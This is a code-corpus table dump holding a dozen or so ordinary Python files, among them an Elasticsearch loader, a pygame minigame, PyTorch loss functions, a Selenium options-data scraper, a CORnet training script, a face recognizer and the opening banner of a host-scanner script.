seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
42754051183 | from datetime import datetime
from elasticsearch import Elasticsearch
from elasticsearch import helpers
import json
import time
es = Elasticsearch()
f = open("yt_data.rst")
lines = f.readlines()
cnt = 1
data_cnt = 0
actions = []
s = time.time()
for line in lines:
data = json.loads(line)
action = {
"_index": "youtube",
"_id":cnt,
"_source": data
}
actions.append(action)
data_cnt+=1
if data_cnt == 20000:
a = helpers.bulk(es, actions)
actions = []
data_cnt = 0
cnt+=1
print(cnt)
a = helpers.bulk(es, actions)
e = time.time()
print("{}s".format(e-s))
f.close() | timothyliu0912/db_project | db/c.py | c.py | py | 641 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "elasticsearch.Elasticsearch",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "elasticsearch.helpers... |
44310767729 | import pygame, colors, random, time, sideclass, draw, timer
from random import randint
def collision(player, enemy, player1, screen, WIDTH, HEIGHT):
if (pygame.sprite.groupcollide(player, enemy, False, True)):
draw.drawlose(enemy, screen, WIDTH, HEIGHT)
player1.score = 0
def side(screen, WIDTH, HEIGHT, clock, timer1, mode):
FPS = 60
# Initializes the groups of objects
player1 = sideclass.player(WIDTH, HEIGHT)
all_players = pygame.sprite.Group()
all_players.add(player1)
all_enemy = pygame.sprite.Group()
enemy1 = sideclass.Enemy(WIDTH, HEIGHT, 5)
all_enemy.add(enemy1)
# Loads 2 instances of the same background for scrolling
background1 = pygame.image.load("backgrounds/jumpback.jpg")
background2 = pygame.image.load("backgrounds/jumpback.jpg")
# Displays info to the user playing the game
draw.info(screen, WIDTH, HEIGHT, 'Score 15 to Move on', 100)
running = True
move1 = 800
move2 = 0
while running:
clock.tick(FPS)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
pygame.quit()
# Draws the background
screen.fill(colors.black)
screen.blit(background1,(move1,0))
screen.blit(background2,(move2,0))
# Randomly spawns enemies
if (random.randrange(0,100)<1 and len(all_enemy) < 2) or len(all_enemy) == 0:
enemy = sideclass.Enemy(WIDTH, HEIGHT, random.randint(5,8))
all_enemy.add(enemy)
# Displays the timer and score
draw.drawtime(timer1, screen)
draw.displayscore(screen,WIDTH,HEIGHT, player1.score)
# Updates player and enemies
all_players.update(WIDTH, HEIGHT)
all_enemy.update(all_enemy, player1)
all_players.draw(screen)
all_enemy.draw(screen)
# Detects collision between enemies and players
collision(all_players, all_enemy, player1, screen, WIDTH, HEIGHT)
# Sees if the player has reached the limit
if player1.score == 15:
if mode: # If in minigame mode
timer1.pause()
draw.drawEnd(screen, WIDTH, HEIGHT, timer1)
else:
draw.drawWin(screen, WIDTH, HEIGHT)
break
# Controls movement of the background to scroll
move1 -= 1
move2 -= 1
if move2 == -800:
move2 = 800
if move1 == -800:
move1 = 800
pygame.display.flip()
def main():
# Driver for minigame mode
WIDTH = 800
HEIGHT = 600
pygame.init()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Jump! Minigame Mode")
clock = pygame.time.Clock()
timer1 = timer.Timer()
timer1.start()
side(screen, WIDTH, HEIGHT, clock, timer1, True)
if __name__=="__main__":
main()
| RamboTheGreat/Minigame-Race | sidescroll.py | sidescroll.py | py | 2,909 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.sprite.groupcollide",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pygame.sprite",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "draw.drawlose",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sideclass.pl... |
16272104179 | import torch
import torch.nn.functional as F
# Focal Loss with alpha=0.25 and gamma=2 (standard)
class FocalLoss(torch.nn.Module):
def __init__(self, alpha=0.25, gamma=2):
super(FocalLoss, self).__init__()
self.alpha = alpha
self.gamma = gamma
def forward(self, pred, targets):
BCE_loss = F.binary_cross_entropy_with_logits(pred, targets, reduction='none')
pt = torch.exp(-BCE_loss)
F_loss = self.alpha * (1-pt)**self.gamma * BCE_loss
return F_loss.mean()
# Label Smoothing with smoothing=0.1
class LabelSmoothingLoss(torch.nn.Module):
def __init__(self, classes=2, smoothing=0.1, dim=-1, weight = None):
"""if smoothing == 0, it's one-hot method
if 0 < smoothing < 1, it's smooth method
"""
super(LabelSmoothingLoss, self).__init__()
self.confidence = 1.0 - smoothing
self.smoothing = smoothing
self.weight = weight
self.cls = classes
self.dim = dim
def forward(self, pred, target):
assert 0 <= self.smoothing < 1
pred = pred.log_softmax(dim=self.dim)
if self.weight is not None:
pred = pred * self.weight.unsqueeze(0)
with torch.no_grad():
true_dist = torch.zeros_like(pred)
true_dist.fill_(self.smoothing / (self.cls - 1))
print(target.data.shape)
print(target.data.unsqueeze(1).shape)
print(pred.data.shape)
print(true_dist.data.shape)
true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)
return torch.mean(torch.sum(-true_dist * pred, dim=self.dim))
'''
torch.Size([1])
torch.Size([1, 1])
torch.Size([1])
torch.Size([1])
Traceback (most recent call last):
File "main.py", line 15, in <module>
main()
File "main.py", line 12, in main
losses,accs,testResults = train(trainArgs)
File "/Midgard/home/martinig/adv-comp-bio/trainAndTest.py", line 54, in train
loss = criterion(y_pred.type(torch.DoubleTensor).squeeze(1),y.type(torch.DoubleTensor))
File "/Midgard/home/martinig/miniconda3/envs/drugVQA/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
return forward_call(*args, **kwargs)
File "/Midgard/home/martinig/adv-comp-bio/loss.py", line 44, in forward
true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)
IndexError: Dimension out of range (expected to be in range of [-1, 0], but got 1)
''' | martinigoyanes/drugVQA | loss.py | loss.py | py | 2,477 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.binary_cross_entropy_with_logits",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 12,
"usage_type": "name"
},
{
... |
15637256017 | import os
import csv
import sys
import fnmatch
import shutil
import time
import re
import config as cfg
import numpy as np
import pandas as pd
import mysql.connector as mysql
import sqlalchemy
from datetime import datetime
from dateutil.parser import parse
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.webdriver.chrome.options import Options
pathOfFilesDled = r'C:\\Users\\ChadBot\\Downloads\\'
pathToMoveDLStocks = r'C:\Users\\ChadBot\\Desktop\\barchartdata\\Stocks\\'
pathToMoveDLETF = r'C:\Users\\ChadBot\\Desktop\\barchartdata\\ETF\\'
pathToMoveDLIndices= r'C:\Users\\ChadBot\\Desktop\\barchartdata\\Indices\\'
def dlData():
chrome_options = Options()
# chrome_options.add_argument("start-minimized")
driver = webdriver.Chrome(r'C:\chromedriver.exe', options=chrome_options)
driver.get("https://www.barchart.com/login")
element = driver.find_element_by_name("email")
element.send_keys(cfg.login['user'])
element = driver.find_element_by_name("password")
element.send_keys(cfg.login['pass'])
element.send_keys(Keys.RETURN)
driver.get("https://www.barchart.com/options/unusual-activity/stocks")
print("stocks")
driver.find_element_by_xpath("//span[contains(.,'download')]").click()
time.sleep(5)
driver.get("https://www.barchart.com/options/unusual-activity/etfs")
print("etfs")
driver.find_element_by_xpath("//span[contains(.,'download')]").click()
time.sleep(5)
driver.get("https://www.barchart.com/options/unusual-activity/indices")
print("Indices")
driver.find_element_by_xpath("//span[contains(.,'download')]").click()
time.sleep(5)
driver.quit()
'''
This function has been deprecated
Bot will not sort csv files and save them in folders or upload to git
New functions implemented to clean up data and push to MySQL DB instead
'''
def sortData():
# Open dir where the data is downloaded
# search for file with .csv
# search for etf, stocks, indices
for f_name in os.listdir(pathOfFilesDled):
if fnmatch.fnmatch(f_name, '*-etfs-*-*-*-*-*.csv'):
try:
shutil.move(pathOfFilesDled + f_name, pathToMoveDLETF)
print("File Moved: " + f_name)
except IOError:
print("Could not move files")
sys.exit()
if fnmatch.fnmatch(f_name, '*-indices-*-*-*-*-*.csv'):
try:
shutil.move(pathOfFilesDled + f_name, pathToMoveDLIndices)
print("File Moved: " + f_name)
except IOError:
print("Could not move files")
sys.exit()
if fnmatch.fnmatch(f_name, '*-stocks-*-*-*-*-*.csv'):
try:
shutil.move(pathOfFilesDled + f_name, pathToMoveDLStocks)
print("File Moved: " + f_name)
except IOError:
print("Could not move files")
sys.exit()
'''
Function also deprecated after cleaning past data
'''
def cleanData(dataPath):
df = pd.read_csv(dataPath).replace('"', '', regex=True)
dateRgx = re.compile('(\d{2}-\d{2}-\d{2})')
dateList = dateRgx.findall(dataPath)
dateStr = str(dateList[0])
dateT = datetime.strftime(parse(dateStr), '%Y-%m-%d')
df.insert(0, 'Date Inserted', dateT)
df = df.set_index('Date Inserted')
df.rename(columns={'Last Trade':'Time'}, inplace=True)
df['IV'] = df['IV'].astype(str).str.rstrip('%').astype(float)
df['Exp Date'] = pd.to_datetime(df['Exp Date'])
df['Exp Date'] = df['Exp Date'].dt.strftime('%Y-%m-%d')
df['Time'] = pd.to_datetime(df['Time'])
df['Time'] = df['Time'].dt.strftime('%H:%M')
df = df[:-1]
print(df.head)
df.to_csv(dataPath)
'''
This function is used to clean existing data that was already scraped
No need to use this function again because new data downloaded will be cleaned
and pushed to MySQL DB
'''
def cleanUpExistingData():
etfPath = r"A:\\git\\ChadBot\\barchart\\ETF\\"
indicesPath = r"A:\\git\\ChadBot\\barchart\\Indices\\"
stockPath = r"A:\\git\\ChadBot\\barchart\\Stocks\\"
for f_name in os.listdir(etfPath):
if fnmatch.fnmatch(f_name, '*-etfs-*-*-*-*-*.csv'):
try:
cleanData(etfPath + f_name)
print("ETFs Cleaned")
except ValueError as e:
print(e)
for f_name in os.listdir(indicesPath):
if fnmatch.fnmatch(f_name, '*-indices-*-*-*-*-*.csv'):
try:
cleanData(indicesPath + f_name)
print("Indices Cleaned")
except ValueError as e:
print(e)
for f_name in os.listdir(stockPath):
if fnmatch.fnmatch(f_name, '*-stocks-*-*-*-*-*.csv'):
try:
cleanData(stockPath + f_name)
print("Stocks Cleaned")
except ValueError as e:
print(e)
def POSTtoDB():
etfPath = r"A:\\git\\ChadBot\\barchart\\ETF\\"
indicesPath = r"A:\\git\\ChadBot\\barchart\\Indices\\"
stockPath = r"A:\\git\\ChadBot\\barchart\\Stocks\\"
db = mysql.connect(
host = cfg.dbLogin['host'],
user = cfg.dbLogin['user'],
password = cfg.dbLogin['pass'],
database = 'barchart'
)
cursor = db.cursor()
cursor.execute("SHOW TABLES")
databases = cursor.fetchall()
print(databases)
# df = pd.read_csv(stockPath + 'unusual-stocks-options-activity-02-14-2020.csv')
with open(stockPath + 'unusual-stocks-options-activity-02-14-2020.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
print(row)
Date_Inserted = row[0]
Symbol= row[1]
Price= row[2]
Type= row[3]
Strike= row[4]
Exp_Date= row[5]
DTE= row[6]
Bid= row[7]
Midpoint= row[8]
Ask= row[9]
Last= row[10]
Volume= row[11]
Open_Int= row[12]
Vol_OI= row[13]
IV= row[14]
Time= row[15]
cursor.execute('''INSERT INTO stocks(Date_Inserted, Symbol, Price, Type, Strike, Exp_Date, DTE, Bid, Midpoint, Ask, Last, Volume, Open_Int, Vol_OI, IV, Time) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)''',(row))
cursor.commit()
if __name__ == "__main__":
dlData()
sortData()
sys.exit()
# POSTtoDB()
# cleanUpExistingData()
| xxwikkixx/ChadBot | barchart/barchartDl.py | barchartDl.py | py | 6,546 | python | en | code | 16 | github-code | 36 | [
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 28,
"usage_type": "name"
},
{... |
38164556201 | import glob
import importlib
import io
import logging
import os
import shlex
import subprocess
import time
import cornet
import numpy as np
import pandas
import torch
import torch.nn as nn
import torch.utils.model_zoo
import torchvision
import tqdm
from PIL import Image
from torch.nn import Module
Image.warnings.simplefilter('ignore')
logger = logging.getLogger(__name__)
torch.backends.cudnn.benchmark = False
normalize = torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
ngpus = 2
epochs = 1
output_path = '/braintree/home/fgeiger/weight_initialization/base_models/model_weights/' # os.path.join(os.path.dirname(__file__), 'model_weights/')
data_path = '/braintree/data2/active/common/imagenet_raw/' if 'IMAGENET' not in os.environ else \
os.environ['IMAGENET']
batch_size = 256
weight_decay = 1e-4
momentum = .9
step_size = 20
lr = .1
workers = 20
if ngpus > 0:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def set_gpus(n=2):
"""
Finds all GPUs on the system and restricts to n of them that have the most
free memory.
"""
gpus = subprocess.run(shlex.split(
'nvidia-smi --query-gpu=index,memory.free,memory.total --format=csv,nounits'), check=True,
stdout=subprocess.PIPE, shell=True).stdout
gpus = pandas.read_csv(io.BytesIO(gpus), sep=', ', engine='python')
print(gpus)
gpus = gpus[gpus['memory.total [MiB]'] > 10000] # only above 10 GB
if os.environ.get('CUDA_VISIBLE_DEVICES') is not None:
visible = [int(i)
for i in os.environ['CUDA_VISIBLE_DEVICES'].split(',')]
gpus = gpus[gpus['index'].isin(visible)]
print(f'GPUs {gpus}')
gpus = gpus.sort_values(by='memory.free [MiB]', ascending=False)
os.environ[
'CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID' # making sure GPUs are numbered the same way as in nvidia_smi
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(
[str(i) for i in gpus['index'].iloc[:n]])
def get_model(pretrained=False):
map_location = None if ngpus > 0 else 'cpu'
model = getattr(cornet, f'cornet_S')
model = model(pretrained=pretrained, map_location=map_location)
if ngpus == 0:
model = model.module # remove DataParallel
if ngpus > 0:
model = model.cuda()
return model
def train(identifier,
model,
restore_path=None, # useful when you want to restart training
save_train_epochs=1, # how often save output during training
save_val_epochs=.5, # how often save output during validation
save_model_epochs=1, # how often save model weigths
save_model_secs=60 * 10, # how often save model (in sec)
areas=None
):
# if os.path.exists(output_path + f'{identifier}_epoch_{epochs:02d}.pth.tar'):
# logger.info('Model already trained')
# return
restore_path = output_path
logger.info('We start training the model')
if ngpus > 1 and torch.cuda.device_count() > 1:
logger.info('We have multiple GPUs detected')
model = nn.DataParallel(model)
model = model.to(device)
elif ngpus > 0 and torch.cuda.device_count() is 1:
logger.info('We run on one GPU')
model = model.to(device)
else:
logger.info('No GPU detected!')
trainer = ImageNetTrain(model, areas)
validator = ImageNetVal(model)
start_epoch = 0
recent_time = time.time()
for epoch in tqdm.trange(start_epoch, epochs, initial=start_epoch, desc='epoch'):
data_load_start = np.nan
for step, data in enumerate(tqdm.tqdm(trainer.data_loader, desc=trainer.name)):
data_load_time = time.time() - data_load_start
global_step = epoch * len(trainer.data_loader) + step
trainer.model.train()
frac_epoch = (global_step + 1) / len(trainer.data_loader)
trainer(frac_epoch, *data)
data_load_start = time.time()
duration = time.time() - recent_time
return {'time': duration}
def test(layer='decoder', sublayer='avgpool', time_step=0, imsize=224):
"""
Suitable for small image sets. If you have thousands of images or it is
taking too long to extract features, consider using
`torchvision.datasets.ImageFolder`, using `ImageNetVal` as an example.
Kwargs:
- layers (choose from: V1, V2, V4, IT, decoder)
- sublayer (e.g., output, conv1, avgpool)
- time_step (which time step to use for storing features)
- imsize (resize image to how many pixels, default: 224)
"""
model = get_model(pretrained=True)
transform = torchvision.transforms.Compose([
torchvision.transforms.Resize((imsize, imsize)),
torchvision.transforms.ToTensor(),
normalize,
])
model.eval()
def _store_feats(layer, inp, output):
"""An ugly but effective way of accessing intermediate model features
"""
_model_feats.append(np.reshape(output, (len(output), -1)).numpy())
try:
m = model.module
except:
m = model
model_layer = getattr(getattr(m, layer), sublayer)
model_layer.register_forward_hook(_store_feats)
model_feats = []
with torch.no_grad():
model_feats = []
fnames = sorted(glob.glob(os.path.join(data_path, '*.*')))
if len(fnames) == 0:
raise Exception(f'No files found in {data_path}')
for fname in tqdm.tqdm(fnames):
try:
im = Image.open(fname).convert('RGB')
except:
raise Exception(f'Unable to load {fname}')
im = transform(im)
im = im.unsqueeze(0) # adding extra dimension for batch size of 1
_model_feats = []
model(im)
model_feats.append(_model_feats[time_step])
model_feats = np.concatenate(model_feats)
if output_path is not None:
fname = f'CORnet-{model}_{layer}_{sublayer}_feats.npy'
np.save(os.path.join(output_path, fname), model_feats)
class ImageNetTrain(object):
def __init__(self, model, config):
self.name = 'train'
self.model = model
self.data_loader = self.data()
self.optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad, model.parameters()),
lr,
momentum=momentum,
weight_decay=weight_decay)
self.lr = torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=step_size)
self.loss = nn.CrossEntropyLoss()
if ngpus > 0:
self.loss = self.loss.cuda()
def data(self):
dataset = torchvision.datasets.ImageFolder(
os.path.join(data_path, 'train'),
torchvision.transforms.Compose([
torchvision.transforms.RandomResizedCrop(224),
torchvision.transforms.RandomHorizontalFlip(),
torchvision.transforms.ToTensor(),
normalize,
]))
data_loader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
shuffle=True,
num_workers=workers,
pin_memory=True)
return data_loader
def __call__(self, frac_epoch, inp, target):
start = time.time()
self.lr.step(epoch=frac_epoch)
with torch.autograd.detect_anomaly():
if ngpus > 0:
inp = inp.to(device)
target = target.cuda(non_blocking=True)
output = self.model(inp)
record = {}
loss = self.loss(output, target)
record['loss'] = loss.item()
record['top1'], record['top5'] = accuracy(output, target, topk=(1, 5))
record['top1'] /= len(output)
record['top5'] /= len(output)
record['learning_rate'] = self.lr.get_lr()[0]
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
record['dur'] = time.time() - start
return record
class ImageNetVal(object):
def __init__(self, model):
self.name = 'val'
self.model = model
self.data_loader = self.data()
self.loss = nn.CrossEntropyLoss(size_average=False)
if ngpus > 0:
self.loss = self.loss.cuda()
def data(self):
dataset = torchvision.datasets.ImageFolder(
os.path.join(data_path, 'val'),
torchvision.transforms.Compose([
torchvision.transforms.Resize(256),
torchvision.transforms.CenterCrop(224),
torchvision.transforms.ToTensor(),
normalize,
]))
data_loader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
shuffle=False,
num_workers=workers,
pin_memory=True)
return data_loader
def __call__(self):
self.model.eval()
start = time.time()
record = {'loss': 0, 'top1': 0, 'top5': 0}
with torch.no_grad():
for (inp, target) in tqdm.tqdm(self.data_loader, desc=self.name):
if ngpus > 0:
inp = inp.to(device)
target = target.to(device)
output = self.model(inp)
record['loss'] += self.loss(output, target).item()
p1, p5 = accuracy(output, target, topk=(1, 5))
record['top1'] += p1
record['top5'] += p5
for key in record:
record[key] /= len(self.data_loader.dataset.samples)
record['dur'] = (time.time() - start) / len(self.data_loader)
print(f'Validation accuracy: Top1 {record["top1"]}, Top5 {record["top5"]}\n')
return record
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
with torch.no_grad():
_, pred = output.topk(max(topk), dim=1, largest=True, sorted=True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = [correct[:k].sum().item() for k in topk]
return res
if __name__ == '__main__':
identifier = 'CORnet-S_cluster2_v2_IT_trconv3_bi_epoch_00'
mod = importlib.import_module(f'cornet.cornet_s')
model_ctr = getattr(mod, f'CORnet_S')
model = model_ctr()
model3 = cornet.cornet_s(False)
model2 = model_ctr()
if os.path.exists(output_path + f'{identifier}.pth.tar'):
logger.info('Resore weights from stored results')
checkpoint = torch.load(output_path + f'{identifier}.pth.tar',
map_location=lambda storage, loc: storage)
class Wrapper(Module):
def __init__(self, model):
super(Wrapper, self).__init__()
self.module = model
model.load_state_dict(checkpoint['state_dict'])
if os.path.exists(output_path + f'CORnet-S_cluster2_IT_full_train_epoch_00.pth.tar'):
logger.info('Resore weights from stored results')
checkpoint2 = torch.load(
output_path + f'CORnet-S_cluster2_v2_IT_trconv3_bi_seed31_epoch_00.pth.tar',
map_location=lambda storage, loc: storage)
checkpoint3 = torch.load(
output_path + f'CORnet-S_cluster2_v2_IT_trconv3_bi_seed42_epoch_00.pth.tar',
map_location=lambda storage, loc: storage) # map onto cpu
model2.load_state_dict(checkpoint2['state_dict'])
for name, m in model2.module.named_parameters():
for name2, m2 in model3.named_parameters():
if name == name2:
print(name)
value1 = m.data.cpu().numpy()
value2 = m2.data.cpu().numpy()
print((value1 == value2).all())
| franzigeiger/training_reductions | base_models/trainer_performance.py | trainer_performance.py | py | 12,170 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "PIL.Image.warnings.simplefilter",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "PIL.Image.warnings",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "PIL.Image",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "log... |
22234739193 | from pykinect2 import PyKinectV2
from pykinect2.PyKinectV2 import *
from pykinect2 import PyKinectRuntime
import numpy as np
import cv2
import time
# kinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color)
# while True:
# if kinect.has_new_color_frame():
# frame = kinect.get_last_color_frame()
# print(np.shape(frame))
# time.sleep(0.5)
cap = cv2.VideoCapture(0)
while True:
updated,frame = cap.read()
gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
cols = 9
rows = 6
# findCirclesGrid takes (num_cols,num_rows)
ret,corners = cv2.findCirclesGrid(gray,(cols,rows),None)
# once the grid is found, press a button to start tracking and make everything around it dark
# if it's not a dark point, then make it white
ret1,thresh = cv2.threshold(gray,100,255,cv2.THRESH_TOZERO)
cv2.drawChessboardCorners(thresh,(cols,rows),corners,ret)
cv2.imshow('thresh',thresh)
k = cv2.waitKey(1)
if k == 27:
break
cv2.destroyAllWindows() | zachvin/KinectImaging | tests.py | tests.py | py | 996 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "cv2.findCircles... |
5577508746 | import json
with open('firm.txt', 'r', encoding='utf-8') as f:
data = []
for line in f:
line = line.replace("\n", "")
string = line.split(" ")
data.append(string)
average = 0
avg_firms = 0
diction = {}
for el in data:
profit = int(el[2]) - int(el[3])
diction.update({el[0]:profit})
if profit > 0:
average = average + profit
avg_firms += 1
average = average / avg_firms
avg_dict = {"Average profit": average}
summary = [diction, avg_dict]
with open('firm.json', 'w', encoding='utf-8') as f:
json.dump(summary, f)
| Ilyagradoboev/geekproject | lesson_5.7.py | lesson_5.7.py | py | 580 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.dump",
"line_number": 25,
"usage_type": "call"
}
] |
30351631272 |
def load_and_get_stats(filename):
"""Reads .wav file and returns data, sampling frequency, and length (time) of audio clip."""
import scipy.io.wavfile as siow
sampling_rate, amplitude_vector = siow.read(filename)
wav_length = amplitude_vector.shape[0] / sampling_rate
return sampling_rate, amplitude_vector, wav_length
def plot_wav_curve(filename, sampling_rate, amplitude_vector, wav_length):
"""Plots amplitude curve for a particular audio clip."""
import matplotlib.pyplot as plt
import numpy as np
time = np.linspace(0, wav_length, amplitude_vector.shape[0])
plt.plot(time, amplitude_vector)
plt.xlabel('Time [s]')
plt.ylabel('Amplitude')
plt.title(f'{filename} - viewed at {sampling_rate} samples/sec')
plt.show()
def split_audio_into_chunks(sampling_rate, amplitude_vector, chunk_size):
"""Reshape data (amplitude vector) into many chunks of chunk_size miliseconds. Returns reshaped data and leftover data not grouped."""
col_size = int(chunk_size / ((1 / sampling_rate) * 1000))
whole = int(len(amplitude_vector) / col_size)
first_partition_index = whole*col_size
first_partition = amplitude_vector[:first_partition_index]
second_partition = amplitude_vector[first_partition_index:]
return first_partition.reshape((whole, col_size)), second_partition
def apply_fourier_transform(chunked_audio):
"""Apply fourier transform to chunked audio snippets to break up each chunk into vector of scores for each frequency band. Aggregates score vectors for each snippet into spectogram to be fed into neural network."""
pass
if __name__ == '__main__':
sampling_rate, amplitude_vector, wav_length = load_and_get_stats('hello.wav')
data, leftovers = split_audio_into_chunks(sampling_rate, amplitude_vector, 20) | Sychee/Piano-Audio-Classifier | audio_to_spectogram.py | audio_to_spectogram.py | py | 1,820 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scipy.io.wavfile.read",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "scipy.io.wavfile",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "numpy.linspace",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot... |
22868444012 | import pandas as pd
import numpy as np
from nltk.corpus import stopwords
nltk_stopwords = stopwords.words('english')
# Sklearn TF-IDF Libraries
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
df_dataset = pd.read_csv("../crawler/layer_three_data.csv")
print("Database loaded in search function")
df_dataset = df_dataset.drop_duplicates(subset=['df_paper_title']) # remove duplicates
def search(keyword):
vectorizer = TfidfVectorizer()
# Index paper titles
X = vectorizer.fit_transform(df_dataset['df_paper_title'])
query_vec = vectorizer.transform([keyword]) # Ip -- (n_docs,x), Op -- (n_docs,n_Feats)
results = cosine_similarity(X, query_vec).reshape((-1,))
search_result = []
# Print Top 100 results
data = {}
df_data = pd.DataFrame(columns=["Title", "URL", "Abstract", "Author", "Date"])
for i in results.argsort()[-100:][::-1]:
data["Title"] = df_dataset.iloc[i, 0]
data["URL"] = df_dataset.iloc[i, 1]
data["Abstract"] = df_dataset.iloc[i, 2]
data["Author"] = df_dataset.iloc[i, 3]
data["Date"] = df_dataset.iloc[i, 4]
df_data = df_data.append(data, ignore_index=True)
# df_data = df_data.to_numpy()
print(df_data)
return df_data
| chois11/7071CEM-R | resources/backend/search_engine.py | search_engine.py | py | 1,376 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sklea... |
24644699429 | import io
import itertools
def part_one():
file = open('inputs\\day_1_part_1.txt', 'r')
total = 0
for line in file:
total = total + int(line)
print(f'Part 1 Total {total}')
def part_two():
file = open('inputs\\day_1_part_1.txt', 'r')
observed_frequencies = {0}
total = 0
for line in itertools.cycle(file):
total = total + int(str.strip(line))
if total in observed_frequencies:
print(f"Frequency {total} has been seen twice.")
break
#print(f'Line {str.strip(line)}. Observed: {total}')
observed_frequencies.add(total)
part_two()
| mruston0/AdventOfCode2018 | day_1_chronal_calibration.py | day_1_chronal_calibration.py | py | 639 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "itertools.cycle",
"line_number": 15,
"usage_type": "call"
}
] |
41203564707 | import cv2
import numpy as np
from PIL import Image
facedetect = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')#create a cascade classifier using haar cascade
cam = cv2.VideoCapture(0)#creates avideo capture object
rec=cv2.createLBPHFaceRecognizer()#create a recognizer object
rec.load("test_trainingdata.yml")#load the training data
id=0
fontFace = cv2.FONT_HERSHEY_SIMPLEX#font to write the name of the person in the image
fontscale = 1
fontcolor = (255, 255, 255)
while(True):
ret, img= cam.read() #capture the frames from the camera object
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)#convert the frame into grayscale
faces = facedetect.detectMultiScale(gray,1.3,5)#detect and extract faces from images
for (x,y,w,h) in faces:
cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),2)
id,conf=rec.predict(gray[y:y+h,x:x+w])#Recognize the Id of the user
if(id==8):
id="Saurav"
elif(id == 1):
id = "Upasana"
elif(id == 3):
id = "Nayan Sir"
elif(id == 4):
id = "Arnab Sir"
elif(id == 5):
id = "kabir"
elif(id == 6):
id = "Aakangsha"
elif (id==7):
id = "Anish"
else:
id="unknown"
cv2.putText(img,str(id),(x,y+h),fontFace,fontscale,fontcolor)#Put predicted Id/Name and rectangle on detected face
cv2.imshow('img',img)
if(cv2.waitKey(1) ==ord('q')):
break;
cam.release() #close the camera
cv2.destroyAllWindows() #close all windows | UPASANANAG/Face-Recognizer | facedetector.py | facedetector.py | py | 1,437 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.CascadeClassifier",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "cv2.createLBPHFaceRecognizer",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "cv2.... |
26285333278 | import os, requests, colorama
from colorama import Fore
green = Fore.GREEN
red = Fore.RED
yellow = Fore.YELLOW
reset = Fore.RESET
#banner
banner = """
__ __ __
/ / / /___ _____/ /_
/ /_/ / __ \/ ___/ __/
/ __ / /_/ (__ ) /_
/_/_/_/\____/____/\__/_ ____ ___ _____
/ ___/ ___/ __ `/ __ \/ __ \/ _ \/ ___/
(__ ) /__/ /_/ / / / / / / / __/ /
/____/\___/\__,_/_/ /_/_/ /_/\___/_/ v.1.0
"""
